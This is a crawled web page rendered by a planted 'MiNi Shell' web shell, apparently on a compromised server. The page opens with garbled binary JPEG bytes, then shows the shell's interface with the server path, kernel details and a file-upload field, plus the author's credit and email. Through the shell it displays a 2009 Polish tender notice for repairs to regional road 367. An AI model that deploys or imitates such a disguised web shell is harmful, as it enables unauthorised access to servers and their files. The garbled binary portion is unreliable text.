JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090514/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090514/149690-N-2009.html

<p class="kh_header"><b>Wrocław: Remont drogi wojewódzkiej nr 367 na odcinku Kamienna Góra - Borówno w km od 40+379 do 40+620, od 41+361 do 43+230, od 45+230 do 45+730
CPV 45233140-2</b><br>
<b>Numer ogłoszenia: 149690 - 2009; data zamieszczenia: 14.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dolnośląska Służba Dróg i Kolei we Wrocławiu , ul. Krakowska 28, 50-425 Wrocław, woj. dolnośląskie, tel. 071 39 17 103, 39 17 104, faks 071 3917105.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dsdik.wroc.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.dsdik.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Budżetowa Jednostki Samorządu Terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont drogi wojewódzkiej nr 367 na odcinku Kamienna Góra - Borówno w km od 40+379 do 40+620, od 41+361 do 43+230, od 45+230 do 45+730
CPV 45233140-2.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Zakres przewidywanych robót  dla odcinka nr 1 od km 40+379 do km 40+620:
a)	Roboty ziemne i rozbiórkowe:
-	mechaniczne ścinanie poboczy o grub. 15 cm- 64,50 m2,
-	odtworzenie rowów - 43m,
-	roboty remontowe - frezowanie nawierzchni bitumicznej - 1828,60 m2,
b)	Przepusty
c)	Odwodnienie i urządzenia obce
d)	Roboty w zakresie różnych nawierzchni:
-	krawężniki betonowe - 217 m,
-	remont załamanych krawędzi jezdni - 94 m2,
-	mechaniczne oczyszczenie i skropienie emulsją asfaltową na zimno podbudowy
 	lub nawierzchni betonowej/bitumicznej; zużycie emulsji 0,8 kg/ m2 - 1894,60 m2,
-	nawierzchnia z mieszanek mineralno - bitumicznych grysowych - warstwa ścieralna asfaltowa - grubość po zagęszcz. 6 cm (wjazdy) - 66 m2,
- 	nawierzchnia z mieszanek mineralno - bitumicznych grysowych - warstwa wiążąca asfaltowa - grubość po zagęszcz. 6 cm dla KR3 - jezdnia główna - 1828,60 m2,
-	mechaniczne oczyszczenie i skropienie emulsją asfaltową na zimno podbudowy 
 	lub nawierzchni betonowej/bitumicznej; zużycie emulsji 0,5 kg/ m2 - 1828,60 m2,
-	nawierzchnie z mastyksu grysowego SMA  o grubości 4 cm dla KR3 (warstwa
 	ścieralna) - jezdnia główna - 1828,60 m2,
-	podbudowa z kruszywa łamanego 0-63mm - warstwa dolna o grubości
 	po zagęszczeniu 10 cm - zjazdy gruntowe - 112 m2,
-	uzupełnienie poboczy i zjazdów gruntowych kruszywem łamanym - 520 m2,
e)	Oznakowanie
2.	Zakres przewidywanych robót  dla odcinka nr 2 od km 41+361 do km 43+230:
a)	Roboty  rozbiórkowe:
	-	roboty remontowe - frezowanie nawierzchni bitumicznej - 5301 m2,
b)	Roboty w zakresie różnych nawierzchni:
-	remont załamanych krawędzi jezdni - 265,05 m2,
-	mechaniczne oczyszczenie i skropienie emulsją asfaltową na zimno podbudowy 
 	lub nawierzchni betonowej/bitumicznej; zużycie emulsji 0,8 kg/ m2 - 5301 m2,
-	nawierzchnia z mieszanek mineralno-bitumicznych grysowych - warstwa wiążąca asfaltowa - grubość po zagęszcz. 7cm dla KR-3 (jezdnia główna)- 5301 m2,
- 	mechaniczne oczyszczenie i skropienie emulsją asfaltową na zimno podbudowy 
 	lub nawierzchni betonowej/bitumicznej; zużycie emulsji 0,5 kg/ m2 - 5301 m2,
-	nawierzchnie z mastyksu grysowego SMA o grubości 4cm dla KR-3 (warstwa 
 	ścieralna) - jezdnia główna - 5301 m2,
-	uzupełnienie poboczy frezowiną - 2308 m2,
c)	Oznakowanie
	d)	Roboty ziemne i rozbiórkowe:
-	mechaniczne ścinanie poboczy i wjazdów - 5255 m2,
-	odtworzenie rowów z wyprofilowaniem dna i skarp - 2464m,
	-	rozebranie przepustów rurowych (1szt.) - 6m,
	-	roboty remontowe - frezowanie nawierzchni- 13152,50m2, 
	e)	Przepusty
f)	Roboty w zakresie różnych nawierzchni:
-	mechaniczne oczyszczenie i skropienie emulsją asfaltową na zimno podbudowy
lub nawierzchni betonowej/bitumicznej; zużycie emulsji 0,8 kg/ m2- 13152,50 m2,
-	nawierzchnia z mieszanek mineralno-bitumicznych grysowych - warstwa wiążąca asfaltowa - grubość po zagęszcz. 7cm dla KR-3 (jezdnia główna, obręby skrzyżowań)- 13152,50 m2,
-	wzmocnienie geosiatką konstrukcji nawierzchni przed spękaniami odbitymi wraz
z przyklejeniem emulsją 1,4kg/ m2- 180m2,
-	mechaniczne oczyszczenie i skropienie emulsją asfaltową na zimno podbudowy 
lub nawierzchni betonowej/bitumicznej; zużycie emulsji 0,5 kg/ m2- 13024,50 m2,
-	nawierzchnie z mastyksu grysowego SMA  o grubości 4cm dla KR-3 (warstwa ścieralna) - jezdnia główna - 13024,50 m2,
-	uzupełnienie poboczy frezowiną przy gr. uzupełnienia 6cm po zagęszczeniu - pobocza - 5024 m2,
-	uzupełnienie poboczy frezowiną przy gr. uzupełnienia 15 cm po zagęszczeniu - wjazdy- 261 m2,
-	demontaż i montaż słupków hektometrowych - 26szt,
-	oznakowanie poziome nawierzchni bitumicznych - na zimno, cienkowarstwowe wykonywane mechanicznie - 965,28m2.
3.	Zakres przewidywanych robót  dla odcinka nr 3 od km 45+230 do km 45+730:
a)	Roboty ziemne i rozbiórkowe:
-	mechaniczne ścinanie poboczy - 2138 m2,
-	odtworzenie rowów z wyprofilowaniem dna i skarp - 954m,
	-	rozebranie przepustów rurowych - 12m,
	-	roboty remontowe - frezowanie nawierzchni bitumicznej- 5050m2, 
	b)	Przepusty
c)	Roboty w zakresie różnych nawierzchni:
-	mechaniczne oczyszczenie i skropienie emulsją asfaltową na zimno podbudowy
lub nawierzchni betonowej/bitumicznej; zużycie emulsji 0,8 kg/ m2- 5050 m2,
-	nawierzchnia z mieszanek mineralno-bitumicznych grysowych - warstwa wiążąca asfaltowa - grubość po zagęszcz. 7cm dla KR-3 (jezdnia główna, obręby skrzyżowań)- 5050 m2,
-	wzmocnienie geosiatką konstrukcji nawierzchni przed spękaniami odbitymi wraz
z przyklejeniem emulsją 1,4kg/ m2- 413m2,
-	mechaniczne oczyszczenie i skropienie emulsją asfaltową na zimno podbudowy 
lub nawierzchni betonowej/bitumicznej; zużycie emulsji 0,5 kg/ m2- 5000,00 m2,
-	nawierzchnie z mastyksu grysowego SMA  o grubości 4cm dla KR-3 (warstwa ścieralna) - jezdnia główna - 5000 m2,
-	uzupełnienie poboczy frezowiną przy gr. uzupełnienia 6cm po zagęszczeniu - pobocza - 2000 m2,
-	uzupełnienie poboczy frezowiną przy gr. uzupełnienia 15 cm po zagęszczeniu - wjazdy - 174 m2,
-	demontaż i montaż słupków hektometrowych - 14szt,
-	oznakowanie poziome nawierzchni bitumicznych - na zimno, cienkowarstwowe wykonywane mechanicznie - 154,72 m2.

Szczegółowo zakres robót dla konkretnej części podano w przedmiarach robót..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 
- 25.000,00 złotych<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą wziąć udział Wykonawcy, którzy: złożą ważną i odpowiednią ofertę oraz:
1.1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
1.2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią 
pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
1.3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
1.4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 PZP,
a ponadto spełniają niżej wymienione warunki:
1.5	dysponują lub będą  dysponowali osobami zdolnymi do wykonania zamówienia, 
 	oraz posiadającymi kwalifikacje niezbędne do wykonania zamówienia tj. min. 1 
 	pracownikiem z uprawnieniami do wykonywania samodzielnych funkcji kierownika 	budowy i mogącym wykazać się decyzjami o stwierdzeniu przygotowania 
 	zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie
 	w zakresie robót drogowych oraz  przynależnością do właściwej Izby Samorządu 	Zawodowego,
 1.6	wykonali w okresie ostatnich 5 lat przed wszczęciem postępowania o udzielenie 
 	zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,
 	min. 2 zadania o wartości min. 1.000 000,00 zł brutto każde lub 1 zadanie o wartości 2.000.000,00  zł brutto w zakresie budowy i/lub przebudowy i/lub remontu dróg (w tym wykonanie nawierzchni z mieszanek mineralno-bitumicznych).
1.7	Wykonali w/w zadania należycie.
1.8	dysponują lub będą dysponować potencjałem technicznym tj. sprzętem niezbędnym 
 do wykonania zamówienia (w ilości min. szt.) tj.:
-	układarka mas bitumicznych - 1 szt.
-	walce stalowe gładkie - 2 szt.
-	walec ogumiony  -  1 szt.
-	skrapiarka do bitumu - 1 szt.
1.9	są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę min. 1.000 000,00 złotych .
1.10	oświadczą, że spełniają warunki określone w art. 22 PZP oraz że nie podlegają 
 	wykluczeniu z postępowania o udzielenie zamówienia zgodnie z art. 24 ustawy 
 	z dnia 29 stycznia 2004 r. Prawo zamówień publicznych.
1.11	zgodnie z art. 26 ust. 2 załączą dokumenty wymienione w § 1 ust.1 pkt 2, 3, 4, 5 ust. 2 pkt 1, 3 i/lub 3a, 5 i/lub 5a, 6 oraz ust. 3 pkt 3 Rozporządzenia Rady 
 	Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może 
 	żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87 z dnia 24 maja 2006 r. poz. 605 z późn. zm.).
2.	Sprawdzenie w/w warunków udziału w postępowaniu odbywać się będzie 
 	na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń 
 	wg zasady spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy - wg ZAŁĄCZNIKA NR 3 do SIWZ. 2.	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
3.	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, opłat,
lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie 
lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania 
decyzji organu podatkowego - wystawione nie wcześniej niż 3 miesiące 
przed upływem terminu składania ofert; 
4.	aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne, 
lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie 
lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania 
decyzji organu podatkowego - wystawione nie wcześniej niż 3 miesiące 
przed upływem terminu składania ofert; 
5.	aktualne informacje z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
6.	aktualne informacje z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
7.	wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat, przed dniem 
 	wszczęcia postępowania o udzielenie zamówienia a jeżeli okres prowadzenia 
 	działalności jest krótszy - w tym okresie - wg ZAŁĄCZNIKA NR 4 do SIWZ;
8.	dokumenty (referencje lub inny dokument) od poprzednich Zamawiających 
 	potwierdzające, że roboty wymienione w załączniku Nr 4 zostały wykonane 
 	należycie; 
9.	wykaz sprzętu -wg ZAŁĄCZNIKA NR 5 do SIWZ;
10.	pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnego
 	do wykonania zamówienia sprzętu, jeżeli w wykazie Wykonawca wskazał sprzęt, którym będzie dysponował;
11.	wykaz osób, które będą uczestniczyć w wykonaniu zamówienia wraz 
 	z informacjami na temat ich kwalifikacji zawodowych i doświadczenia 
 	wraz z dokumentami stwierdzającymi posiadane uprawnienia, - wg ZAŁĄCZNIKA 
 	NR 6 do SIWZ;
12.	pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych 
 	do wykonania zamówienia, jeżeli w wykazie Wykonawca wskazał osoby, którym 
 	będzie dysponował;
13.	dokumenty potwierdzające, że osoby, które będą uczestniczyć w wykonaniu 
 	zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają 
    	obowiązek posiadania takich uprawnień;
14.	polisę lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony 
 	od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej;.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.dsdik.wroc.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Materiały przetargowe można również nabyć w cenie 7 zł w siedzibie Zamawiającego, pokój 220 lub za zaliczeniem pocztowym..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.06.2009 godzina 11:00, miejsce: Siedziba Zamawiającego - Kancelaria (parter biurowca). Otwarcie ofert w dniu 04.06.2009r.o godz. 11:30 siedziba Zamawiającego, sala Konferencyjna..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com